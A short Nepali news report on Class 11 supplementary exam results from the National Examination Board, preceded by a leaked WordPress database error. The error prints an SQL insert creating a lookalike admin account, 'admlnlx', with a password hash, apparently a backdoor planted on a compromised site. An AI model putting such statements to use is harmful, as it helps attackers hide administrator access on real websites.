WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6qukqee7DHYKXKHM3C7r9LiQYRhJf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 23:28:33', '', 'admlnlx', 'admlnlx')
भक्तपुर, माघ २३-
राष्ट्रिय परीक्षा बोर्ड सानोठिमीले यही माघ ८ गते सञ्चालन गरेको कक्षा ११ को मौका परीक्षाको नतिजा आज सार्वजनिक गरेको छ ।
बोर्डका परीक्षा नियन्त्रक सन्तोष अर्यालले परीक्षामा ८६ दशमलव २४ प्रतिशत परीक्षार्थी उतीर्ण भएको जानकारी दिनुभयो । परीक्षामा कुल ५३ हजार ५०७ जना परीक्षार्थी सहभागि भएकोमा ४६ हजार १४३ जना परीक्षार्थी उतीर्ण भएको उहाँले जानकारी दिनुभयो ।
बोर्डले कक्षा ११ को नियमित परीक्षामा एक विषयमा अनुतीर्ण भएका परीक्षार्थीका लागि मौका परीक्षा सञ्चालन गरेको थियो । -रासस